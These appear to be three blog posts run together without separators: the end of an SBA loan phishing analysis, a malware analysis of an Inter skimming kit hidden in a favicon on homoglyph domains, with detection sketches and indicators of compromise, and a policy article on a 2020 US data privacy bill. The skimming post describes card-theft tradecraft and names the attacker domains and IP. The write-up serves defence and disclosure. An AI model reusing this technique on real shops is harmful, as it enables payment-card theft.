This is where things get interesting. Even though the sender’s email is disastercustomerservice@sba.gov, when you hit the reply button, it shows a different email address: disastercustomerservice@gov-sba[.]us. While sba.gov is the official and legitimate government website, gov-sba[.]us is not.
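
These checks can also be scripted. Below is a minimal sketch in Node.js that pulls the Received hosts out of a raw header block and flags a mismatch between the From and Reply-To domains (the header sample is a simplified illustration based on the values discussed above):

// Flag suspicious relays and a From/Reply-To domain mismatch in raw email headers.
const rawHeaders = `From: disastercustomerservice@sba.gov
Reply-To: disastercustomerservice@gov-sba.us
Received: from park-mx.above.com by mx.example.net`;

function domainOf(address) {
  const match = address.match(/@([A-Za-z0-9.-]+)/);
  return match ? match[1].toLowerCase() : null;
}

const from = rawHeaders.match(/^From:\s*(.+)$/m)?.[1];
const replyTo = rawHeaders.match(/^Reply-To:\s*(.+)$/m)?.[1];
const relays = [...rawHeaders.matchAll(/^Received:\s*from\s+(\S+)/gm)].map((m) => m[1]);

console.log('Received hosts:', relays); // [ 'park-mx.above.com' ]
if (from && replyTo && domainOf(from) !== domainOf(replyTo)) {
  console.log(`Red flag: replies go to ${domainOf(replyTo)}, not ${domainOf(from)}`);
}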

spoofed email from sba phishing email
Figure 8: Domain registered by scammers shortly before the attack

That domain name (gov-sba[.]us) was registered just days before the email campaign began and clearly does not belong to the US government.

However, we should note that this campaign is quite elaborate and that it would be easy to fall for it. Sadly, the last thing you would want when applying for a loan is to be out of even more money.

If you reply to this email with the completed form containing private information that includes your bank account details, that is exactly what would happen.

Tips on how to protect yourself

There is no question that people should be extremely cautious whenever they are asked to fill out information online—especially in an email. Fraudsters are lurking at every corner and ready to pounce on the next opportunity.

Both the Department of Justice and the Small Business Administration have been warning of scams pertaining to SBA loans. Their respective sites provide various tips on how to steer clear of various malicious schemes.

Perhaps the biggest takeaway, especially when it comes to phishing emails, is that the sender’s address can easily be spoofed and is in no way a solid guarantee of legitimacy, even if it looks exactly the same.

Because we can’t expect everyone to check email headers and metadata, we can at least suggest double-checking the legitimacy of any communication with a friend or by phoning the government organization. For the latter, we always recommend never dialing the number found in an email or left on a voicemail, as it could be fake. Google the organization to find its correct contact number.

Malwarebytes also protects against phishing attacks and malware by blocking offending infrastructure used by scammers.

Inter skimming kit used in homoglyph attacks

As we continue to track web threats and credit card skimming in particular, we often rediscover techniques we’ve encountered elsewhere before.

In this post, we share a recent find that involves what is known as a homoglyph attack. This technique has been exploited for some time already, especially in phishing scams with IDN homograph attacks.

The idea is simple and consists of using characters that look the same in order to dupe users. Sometimes the characters are from a different language set; sometimes it’s as simple as capitalizing the letter ‘i’ to make it appear like a lowercase ‘l’.

A threat actor is using this technique on several domain names to load the popular Inter skimming kit inside a favicon file. It may not be their first rodeo either, as some ties point to an existing Magecart group.

Discovery

We collect information about web threats in various ways, from live crawling of websites to hunting with other tools such as VirusTotal.

While writing rules for hunting is a continuous and time-consuming process, identifying relevant threats within large data sets is also a difficult exercise.

One of our YARA rules triggered a detection for the Inter skimming kit on a file uploaded to VirusTotal. Considering that Inter is a popular framework, we actually get dozens and dozens of alerts each day.

VT
Figure 1: VirusTotal hunting with YARA

This one looked different, though, because the detected file was not typical HTML or JavaScript, but an .ico file instead.

One downside of finding files via VT hunting, especially when it comes to web threats, is that we don’t quite know where they come from. Thankfully, this one gave a little bit of a clue when we inspected the file and saw a “gate” (data exfiltration server):

VT gate
Figure 2: Checking the content of a match for any clues

Homoglyph attack

At first glance, we read that domain as ‘cigarpage’ when in fact it is ‘cigarpaqe’. A quick lookup confirmed that the correct website is indeed cigarpage.com and cigarpaqe[.]com is the imposter.
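
To illustrate why such lookalikes slip past the eye, here is a minimal sketch (the confusable map is ours and deliberately tiny, not a complete catalog) of how a defender might canonicalize visually confusable characters before comparing a candidate domain against the brand it imitates:

// Map visually confusable characters to one canonical form, then compare.
const canonical = (domain) =>
  domain
    .replace(/[Il1]/g, 'i') // capital I, lowercase l, and digit 1 read alike
    .replace(/q/g, 'g')     // q passes for g at a glance, as in this campaign
    .replace(/0/g, 'o')
    .toLowerCase();

function isHomoglyphOf(candidate, brand) {
  return candidate !== brand && canonical(candidate) === canonical(brand);
}

console.log(isHomoglyphOf('cigarpaqe.com', 'cigarpage.com')); // true
console.log(isHomoglyphOf('cigarpage.com', 'cigarpage.com')); // false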

The legitimate site was hacked and injected with an innocuous piece of code referencing an icon file:

compromise
Figure 3: Malicious code injection to load external resource

It plays an important role in loading a copycat favicon from the fake site, using the same URI path in order to keep it looking as authentic as possible. This is actually not the first time we’ve seen skimming attacks abuse the favicon file.

compare ico
Figure 4: Side by side of the legitimate and decoy sites

The reason the attackers are loading this favicon from a different location becomes obvious as we examine it more closely. While the legitimate file is small and typical, the one loaded from the homoglyph domain contains a large piece of JavaScript.

JS ico
Figure 5: Embedded data inside the favicon
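
A genuine .ico file is binary image data, so the presence of readable JavaScript tokens inside one is a strong red flag. Here is a minimal detection sketch (Node 18+ for the built-in fetch; the URL and token list are illustrative, not exhaustive):

// Flag favicons that contain script-like text instead of pure image data.
const SCRIPT_TOKENS = [/function\s*\(/, /document\./, /eval\s*\(/, /addEventListener/];

async function faviconLooksSuspicious(url) {
  const res = await fetch(url);
  const body = Buffer.from(await res.arrayBuffer()).toString('latin1');
  return SCRIPT_TOKENS.some((token) => token.test(body));
}

faviconLooksSuspicious('https://example.com/favicon.ico')
  .then((flag) => console.log(flag ? 'script tokens found in favicon' : 'looks clean'));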

Skimmer

This JavaScript is the one that originally triggered a detection for our Inter skimming kit YARA rule. The screenshot below shows the form fields on a payment page that are being monitored and their corresponding data.

skimmer inter
Figure 6: Skimming script

The gate used for exfiltration has the same domain that was used to host the malicious favicon file.

Figure 7: Data exfiltration request

Homoglyph attacks with a historic tie to Magecart Group 8

The threat actor did not target only that one website, but several more belonging to the same victim.

Looking at the malicious infrastructure (51.83.209.11), we can see several domains were registered recently with the same homoglyph technique.

maltego graph
Figure 8: Connections between homoglyphs and known infrastructure

Here are the original domain names on the left, and their homoglyph version on the right:

cigarpage.com:cigarpaqe.com
fieldsupply.com:fleldsupply.com
wingsupply.com:winqsupply.com

A fourth domain stands out from the rest: zoplm.com. This is also a homoglyph, for zopim.com, but that domain has a history. It was previously associated with Magecart Group 8 (RiskIQ)/CoffeMokko (Group-IB) and was recently registered again after several months of inactivity.

heatmap
Figure 9: RiskIQ heatmap for the domain zoplm.com

The skimming code sometimes referred to as CoffeMokko is quite different from the one involved here. However, according to Group-IB, this threat actor may have reused skimming code from others, in particular Group 1 (RiskIQ) in a skimmer also known as Grelos and seen in several attacks.

In addition, Group 8 was documented in high-profile breaches, including one that is relevant here: the MyPillow compromise. That attack involved injecting malicious third-party JavaScript hosted on mypiltow.com (note the homoglyph of mypillow.com).

While homoglyph attacks are not restricted to one threat actor, especially when it comes to spoofing legitimate web properties, it is still interesting to note in correlation with infrastructure reuse.

Combining techniques

Threat actors love to take advantage of any technique that will provide them with a layer of evasion, no matter how small that is.

Code re-use poses a problem for defenders as it blurs the lines between the different attacks we see and makes any kind of attribution harder.

One thing we know from experience is that previously used infrastructure has a tendency to come back up again, either from the same threat actor or different ones. It may sound counterproductive to leverage already known (and likely blacklisted) domains or IPs, but it has its advantages, too—in particular, when a number of compromised (and never cleaned up) sites still load third-party scripts from those domains.

We contacted the victim site but also noticed that the malicious code had already been removed. Malwarebytes users are protected against this homoglyph attack.

protection
Figure 10: Malwarebytes Browser Guard protecting shoppers

Indicators of Compromise

Homoglyph domains/IP

cigarpaqe[.]com
fleldsupply[.]com
winqsupply[.]com
zoplm[.]com
51.83.209[.]11

Data Accountability and Transparency Act of 2020 looks beyond consent

In the United States, data privacy is hard work—particularly for the American people. But one US Senator believes it shouldn’t have to be.

In June, Democratic Senator Sherrod Brown of Ohio released a discussion draft of a new data privacy bill to improve Americans’ data privacy rights and their relationship with the countless companies that collect, store, and share their personal data. While the proposed federal bill includes data rights for the public and data restrictions for organizations that align with many previous data privacy bills, its primary thrust is somewhat novel: Consent is unmanageable at today’s scale.

Instead of having to click “Yes” to innumerable, unknown data collection practices, Sen. Brown said, Americans should be able to trust that their online privacy remains intact, no clicking necessary.

As the Senator wrote in his opinion piece published in Wired: “Privacy isn’t a right you can click away.”

The Data Accountability and Transparency Act

In mid-June, Sen. Brown introduced the discussion draft of the Data Accountability and Transparency Act (which does not appear to have an official acronym, and which bears a perhaps confusing similarity in title to the 2014 law, the Digital Accountability and Transparency Act).

Broadly, the bill attempts to wrangle better data privacy protections in three ways. First, it grants now-commonly proposed data privacy rights to Americans, including the rights of data access, portability, transparency, deletion, and accuracy and correction. Second, it places new restrictions on how companies and organizations can collect, store, share, and sell Americans’ personal data. The bill’s restrictions are tighter than many other bills, and they include strict rules on how long a company can keep a person’s data. Finally, the bill would create a new data privacy agency that would enforce the rules of the bill and manage consumer complaints.

Buried deeper in the bill, though, are two proposals that are less common. The bill proposes an outright ban on facial recognition technology, and it extends what is called a “private right of action” to the American public, meaning that, if a company were to violate the data privacy rights of an everyday consumer, that consumer could, on their own, bring legal action against the company.

Frustratingly, that is not how it works today. Instead, Americans must often rely on government agencies or their own state Attorney General to get any legal recourse in the case of, for example, a harmful data breach.

If Americans don’t like the end results of the government’s enforcement attempts? Tough luck. Many Americans faced this unfortunate truth last year, when the US Federal Trade Commission reached a settlement agreement with Equifax, following the credit reporting agency’s enormous data breach which affected 147 million Americans.

Announced with some premature fanfare online, the FTC secured a way for Americans affected by the data breach to apply for up to $125 each. The problem? If every affected American actually opted for a cash repayment, the real money they’d see would be 21 cents. Cents.

That’s what happens for one of the largest data breaches in recent history. But what about for smaller data breaches that don’t get national or statewide attention? That’s where a private right of action might come into play.

As we wrote last year, some privacy experts see a private right of action as the cornerstone to an effective, meaningful data privacy bill. In speaking then with Malwarebytes Labs, Purism founder and chief executive Todd Weaver said:

“If you can’t sue or do anything to go after these companies that are committing these atrocities, where does that leave us?” 

For many Americans, it could leave them with a couple of dimes in their pocket.

Casting away consent management in the Data Accountability and Transparency Act

Today, the bargain that most Americans strike when using various online platforms is tilted against them. First, they are told that, to use a certain platform, they must create an account, and in creating that account, they must agree to having their data used in ways that only a lawyer can understand, described in a paragraph buried deep in a thousand-page end-user license agreement. If a consumer disagrees with the way their data will be used, they are often told they cannot access the platform at all. Better luck next time.

But under the Data Accountability and Transparency Act, there would be no opportunity for a consumer’s data to be used in ways they do not anticipate, because the bill would prohibit many uses of personal data that are not necessary for the basic operation of a company. And the bill’s broad applicability affects many companies today.

Sen. Brown’s bill targets what it calls “data aggregators,” a term that covers any individual, government entity, company, corporation, or organization that collects personal data in any significant way. Individuals who collect, use, and share personal data for purely personal reasons, however, are exempt from the bill’s provisions.

The bill’s wide net thus includes all of today’s most popular tech companies, from Facebook to Google to Airbnb to Lyft to Pinterest. It also includes the countless data brokers who help power today’s data economy, packaging Americans’ personal data and online behavior and selling it to the highest bidders.

The restrictions on these companies are concise and firm.

According to the bill, data aggregators “shall not collect, use, or share, or cause to be collected, used, or shared any personal data,” except for “strictly necessary” purposes. Those purposes are laid out in the bill, and they include providing “a good, service, or specific feature requested by an individual in an intentional interaction,” engaging in journalism, conducting scientific research, employing workers and paying them, and complying with laws and with legal inquiries. In some cases, the bill allows for delivering advertisements, too.

The purpose of these restrictions, Sen. Brown explained, is to prevent the cascade of worrying data practices that affects Americans every day. Because invariably, Sen. Brown said, when an American consumer agrees to have their data used in one obvious way, their data actually gets used in an unseen multitude of other ways.

Under the Data Accountability and Transparency Act, that wouldn’t happen, Sen. Brown said.

“For example, signing up for a credit card online won’t give the bank the right to use your data for anything else—not marketing, and certainly not to use that data to sign you up for five more accounts you didn’t ask for (we’re looking at you, Wells Fargo),” Sen. Brown said in Wired. “It’s not only the specific companies you sign away your data to that profit off it—they sell it to other companies you’ve never heard of, without your knowledge.”

Thus, Sen. Brown’s bill proposes a different data ecosystem: Perhaps data, at its outset, should be restricted.

Are data restrictions enough?

Doing away with consent in tomorrow’s data privacy regime is not a unique idea—the Center for Democracy and Technology released its own draft data privacy bill in 2018 that extended a set of digital civil rights that cannot be signed away.

But what if consent were not something to be replaced, but rather something to be built on?

That’s the theory proposed by the Electronic Frontier Foundation, said Adam Schwartz, a senior staff attorney for the digital rights nonprofit.

Schwartz said that Sen. Brown’s bill follows a “kind of philosophical view that we see in some corners of the privacy discourse, which is that consent is just too hard—that consumers are being overwhelmed by screens that say ‘Do you consent?’”

Therefore, Schwartz said, in a bill like the Data Accountability and Transparency Act, “in lieu of consent, you see data minimization”—a term used to describe the set of practices that require companies to collect only what they need, store only what is necessary, and share as little as possible while giving consumers what they asked for.
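As a toy illustration of the term (our own sketch, not language from the bill or EFF), data minimization in code can be as simple as an allowlist of strictly necessary fields, with everything else dropped before storage:

# Toy sketch of data minimization: keep only fields that are strictly
# necessary for the service the user actually requested; drop the rest.
STRICTLY_NECESSARY = {"email", "shipping_address"}  # assumed for this example

def minimize(submitted):
    """Filter a signup payload down to the allowlisted fields before storage."""
    return {k: v for k, v in submitted.items() if k in STRICTLY_NECESSARY}

signup = {
    "email": "user@example.com",
    "shipping_address": "1 Main St",
    "birthday": "1990-01-01",                       # not needed to ship an order
    "browsing_history": ["shop.example/item/123"],  # not needed at all
}
print(minimize(signup))  # only email and shipping_address survive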

But instead of subscribing only to data minimization, Schwartz said, EFF takes what he called a “belt-and-suspenders” approach that includes consent. In other words, the more support systems for consumers, the better.

“We concede there are problems with consent—confusing click-throughs, yes—but think that if you do consent plus two other things, it can become meaningful.”

To make a consent model more meaningful, Schwartz said consumers should receive two other protections. First, any screens or agreements that ask for a user’s consent should not include any “dark patterns.” The term describes user-experience design techniques that can push a consumer into a decision that does not benefit them. For example, a company could ask for a user’s consent to use their data in myriad, imperceptible ways, and then present the user with two options: one in a bright, bold green button, and the other in pale gray, small text.

The practice is popular—and despised—enough to warrant a sort of watchdog Twitter account.

Second, Schwartz said, a consent model should require a ban on “pay for privacy” schemes, in which organizations and companies retaliate against consumers who choose to protect their own privacy. That could mean consumers pay a literal price to exercise their privacy rights, or it could mean withholding a discount or feature that is offered to those who waive those rights.

Sen. Brown’s bill does prohibit “pay for privacy” schemes—a move that we are glad to see, as we have reported on the potential dangers of these frameworks in the past.

What’s next?

Because Congress is attempting—and failing—to address the homelessness crisis likely to kick off this month, as the cratering American economy collides with the evaporation of eviction protections across the country, an issue like data privacy is probably not top of mind.

That said, the introduction of more data privacy bills over the past two years has pushed the legislative discussion into a more substantial realm. Just over two years ago, data privacy bills took more piecemeal approaches, focusing, for example, on the “clarity” of end-user license agreements.

Today, the conversation has advanced to the point that a bill like the Data Accountability and Transparency Act does not seek “clarity”; it seeks to do away with the entire consent infrastructure built around us.

It’s not a bad start.
